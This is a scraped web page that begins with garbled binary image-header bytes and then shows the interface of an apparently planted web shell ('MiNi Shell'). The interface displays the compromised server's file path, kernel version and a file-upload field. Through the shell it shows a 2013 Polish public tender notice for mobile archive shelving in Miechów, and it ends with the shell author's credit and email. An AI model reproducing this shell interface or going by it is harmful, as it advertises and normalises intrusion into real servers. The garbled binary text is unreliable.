JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131018/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131018/426082-N-2013.html

<p class="kh_header"><b>Kraków: Dostawa wraz z montażem systemu regałów przesuwnych w lokalu Biura Powiatowego w Miechowie</b><br>
<b>Numer ogłoszenia: 426082 - 2013; data zamieszczenia: 18.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa , ul. Lubicz 25, 31-503 Kraków, woj. małopolskie, tel. 012 6298010, faks 012 4211311.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja wykonawcza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem systemu regałów przesuwnych w lokalu Biura Powiatowego w Miechowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa wraz z montażem systemu regałów przesuwnych w lokalu Biura Powiatowego ARiMR w Miechowie ul. Konopnickiej 23.

Regał przejezdny dwustronny o szerokości 70 cm, wykonany ze stali, ściany boczne pełne, skonstruowane z dwóch słupków pionowych (w przekroju prostokąt) połączonych ze sobą wypełnieniem z blachy lub skonstruowane w sposób zapewniający sztywność                                                                         i wytrzymałość, malowany metodą proszkowa. Regał wyposażony w półki o nośności minimum 70 kg/mb, mocowane na zaczepach (każda półka na czterech niezależnych zaczepach) lub przy użyciu innych rozwiązań zapewniających równie stabilne mocowanie, z możliwością przestawienia od 1,5 do 3 cm. Każda podwójna półka wyposażona w listwy zapółkowe uniemożliwiające przesunięcie się dokumentacji na sąsiednią półkę wzdłuż dłuższej krawędzi. Regał zaopatrzony w stalowe tory jezdne zamontowane na podłodze betonowe pokrytej płytkami gresowymi, z niezbędnym mechanizmem umożliwiającym przesuwanie, składającym się z korby i cichobieżnej przekładni zębatej lub łańcuchowej. Korba trójramienna powinna być wykonana z tworzywa sztucznego, natomiast sam uchwyt do kręcenia korby z gumy lub tworzywa sztucznego i powinien być ruchomy z uchwytami kulkowymi obracającymi się wokół własnej osi. Korba wyposażona w blokadę przesuwu umieszczoną w jej środku, unieruchamiającą regały podczas pracy. Ściana czołowa wyposażona w szyldy do numeracji i oznaczenia zawartości regału. Odległość pomiędzy półkami 40 cm w prześwicie, grubość półki od 2 do 3 cm. Wszystkie regały zaopatrzone w odboje zabezpieczające przed przypadkowym przygnieceniem palców podczas przesuwania oraz blokady uniemożliwiające przywróceniu się regału. Regały zakończone półką wieńczącą.
Sposób rozmieszczenia regałów przesuwnych w lokalu Biura Powiatowego ARiMR w Miechowie określa rysunek poglądowy stanowiący Załącznik nr 7 do SIWZ. 
Regały muszą spełniać następujące wymogi:
-	długość półki: 100 cm
-	szerokość półki: 35 cm, wykonane ze stali
-	ściany boczne pełne, malowane metodą proszkową koloru jasno-szarego (RAL 7035 lub RAL 9002)
-	nośność półki 70-100 kg/mb
-	półki mocowane na zaczepach (mocowana na 4 niezależnych zaczepach)
-	płynna regulacja zaczepów od 1,5 do 3 cm
-	każda podwójna półka wyposażona w szybko demontowane listwy zapółkowe uniemożliwiające przesuwanie się dokumentacji na sąsiednią półkę wzdłuż dłuższej jej krawędzi
-	ściana czołowa wyposażona w szyldy do numeracji i oznaczenia
            zawartości regału
-	pierwsza półka na wysokości pomiędzy 10 a 15 cm od podłogi
-	odstępy między półkami 40 cm
-	grubość półki od 2 cm do 3 cm (mierzone wywinięcie blachy)
-	ścianki działowe: pełne
-	regały zakończone półką wieńczącą
-	regały zaopatrzone w odboje zabezpieczające przed przypadkowym
            przygnieceniem palców
-	korba trójramienna wyposażona w uchwyty kulkowe obracające się wokół własnej osi, wyposażona w blokadę przesuwu unieruchamiającą regały podczas pracy
-	regały montowane w sposób zapewniający stabilność i uniemożliwiający ich przewrócenie
-	tory jezdne metalowe zamontowane w sposób umożliwiający stabilność i bezpieczeństwo pracy
-	 wszystkie elementy zewnętrzne regałów, półek, ścian osłon pozbawione ostrych krawędzi
W pomieszczeniu nr 1:  osiemnaście modułów, każdy złożony z dwóch regałów dwustronnych (każdy regał dwustronny składa się z ośmiu półek o wymiarach: długość: 100 cm, szerokość półek: 70 cm (pojedyncza półka: 35 cm), pierwsza półka pomiędzy 10 a 15 cm od podłogi, kolejne co 40 cm, ostatnia, ósma półka wieńcząca, maksymalnie na wysokości 2,95 m), 
W pomieszczeniu nr 2: dziesięć modułów, każdy złożony z trzech regałów dwustronnych (każdy regał dwustronny składa się z siedmiu półek o wymiarach: długość: 100 cm, szerokość półek: 70 cm (pojedyncza półka: 35 cm), pierwsza półka pomiędzy 10 a 15 cm od podłogi, kolejne co 40 cm, ostatnia, siódma półka wieńcząca, maksymalnie na wysokości 2,55 do 2,60 m) oraz trzy moduły, każdy złożony z dwóch regałów dwustronnych (każdy regał dwustronny składa się z siedmiu półek o wymiarach: długość: 100 cm, szerokość półek: 70 cm (pojedyncza półka: 35 cm), pierwsza półka pomiędzy 10 a 15 cm od podłogi, kolejne co 40 cm, ostatnia, siódma półka wieńcząca, maksymalnie na wysokości 2,55 do 2,60 m), 
W pomieszczeniu nr 3: trzy moduły, każdy złożony z czterech regałów dwustronnych (każdy regał dwustronny składa się z siedmiu półek o wymiarach: długość: 100 cm, szerokość półek: 70 cm (pojedyncza półka: 35 cm), pierwsza półka pomiędzy 10 a 15 cm od podłogi, kolejne co 40 cm, ostatnia, siódma półka wieńcząca, maksymalnie na wysokości 2,55 do 2,60 m) oraz trzy moduły, każdy złożony z dwóch regałów dwustronnych (każdy regał dwustronny składa się z siedmiu półek o wymiarach: długość: 100 cm, szerokość półek: 70 cm (pojedyncza półka: 35 cm), pierwsza półka pomiędzy 10 a 15 cm od podłogi, kolejne co 40 cm, ostatnia, siódma półka wieńcząca, maksymalnie na wysokości 2,55 do 2,60 m), 
W pomieszczeniu nr 4: trzy moduły, każdy złożony z trzech regałów dwustronnych (każdy regał dwustronny składa się z ośmiu półek o wymiarach: długość: 100 cm, szerokość półek: 70 cm (pojedyncza półka: 35 cm), pierwsza półka pomiędzy 10 a 15 cm od podłogi, kolejne co 40 cm, ostatnia, ósma półka wieńcząca, maksymalnie na wysokości 2,95 m).
2.	Informacje ogólne 
2.1.	W trakcie wykonywania montażu regałów wykonawca zobowiązany jest do przestrzegania przepisów w zakresie bhp i ochrony przeciwpożarowej
2.2.	Wykonawca ponosi odpowiedzialność za szkody powstałe w budynku lub jego wyposażeniu w trakcie montażu regałów
2.3.	Wykonawca zobowiązany jest do utrzymywania stałego kontaktu ze wskazanym przez Zamawiającego przedstawicielem w sposób wzajemnie uzgodniony, w tym do zgłaszania wszelkich stwierdzonych utrudnień w prawidłowym wykonywaniu przedmiotu zamówienia
3.	Podłoga pokryta płytkami gresowymi, 
4.	Zamawiający informuje, iż rysunek stanowiący Załącznik nr 7 do niniejszej Specyfikacji ma charakter poglądowy i służy do wskazania zaplanowanego sposobu rozmieszczenia regałów. W zakresie wymiarów i technologii wykonania wiążący charakter mają postanowienia niniejszego rozdziału Specyfikacji Istotnych warunków Zamówienia
5.	Zamawiający zaleca zainteresowanym wykonawcom przeprowadzenie wizji lokalnej w budynku Biura Powiatowego ARiMR w Miechowie. W celu ustalenia terminu oględzin należy kontaktować się z: Łukaszem Biela, Tel. 12 629 81 58 lub Romualdem Jaworskim: tel. 12 629 80 02.
6.	Zamawiający informuje, iż w lokalu Biura Powiatowego Zamawiającego w Miechowie trwają obecnie prace modernizacyjno-adaptacyjne. W przypadku, gdy stan zaawansowania tychże prac uniemożliwi lub w znacznym stopniu utrudni montaż systemu regałów przesuwnych, Zamawiający odpowiednio przesunie termin zakończenia montażu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.13.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał minimum jedną dostawę systemu regałów przesuwnych o wartości minimum 50 000 zł brutto</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
- działania siły wyższej lub wystąpienia stanu wyższej konieczności
- wystąpienia warunków atmosferycznych całkowicie uniemożliwiających wykonanie przedmiotu zamówienia w wyznaczonych terminach
- zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe
- zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia
- opóźnienia w realizacji prac adaptacyjnych w lokalu, w którym będzie realizowany przedmiot umowy,
- omyłek pisarskich lub błędów rachunkowych,
-  mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
-  jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego
- innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25, 31-503 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2013 godzina 11:00, miejsce: Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25, 31-503 Kraków, Dziennik Podawczy (IV piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com